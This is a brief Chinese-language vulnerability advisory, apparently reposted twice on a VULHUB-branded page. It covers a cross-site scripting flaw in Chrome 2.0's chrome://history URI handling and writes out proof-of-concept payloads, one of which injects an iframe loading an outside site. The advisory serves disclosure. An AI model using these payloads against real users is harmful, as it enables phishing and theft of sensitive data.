VULHUB ™

Bugraq ID: 35841 Google Chrome是一款流行的WEB浏览器。 Google Chrome处理特殊构建的URI缺少充分过滤，远程攻击者可以利用漏洞进行跨站脚本攻击，获得敏感信息。 构建如下的URI，诱使用户访问，可获得目标用户敏感信息： chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2 Fmarquee%3E view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee> chrome://history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines .Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E Google Chrome 2.0.172 37 厂商解决方案 目前没有解决方案提供： http://www.google.com/chrome

Bugraq ID: 35841 Google Chrome是一款流行的WEB浏览器。 Google Chrome处理特殊构建的URI缺少充分过滤，远程攻击者可以利用漏洞进行跨站脚本攻击，获得敏感信息。 构建如下的URI，诱使用户访问，可获得目标用户敏感信息： chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2 Fmarquee%3E view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee> chrome://history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines .Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E Google Chrome 2.0.172 37 厂商解决方案 目前没有解决方案提供： http://www.google.com/chrome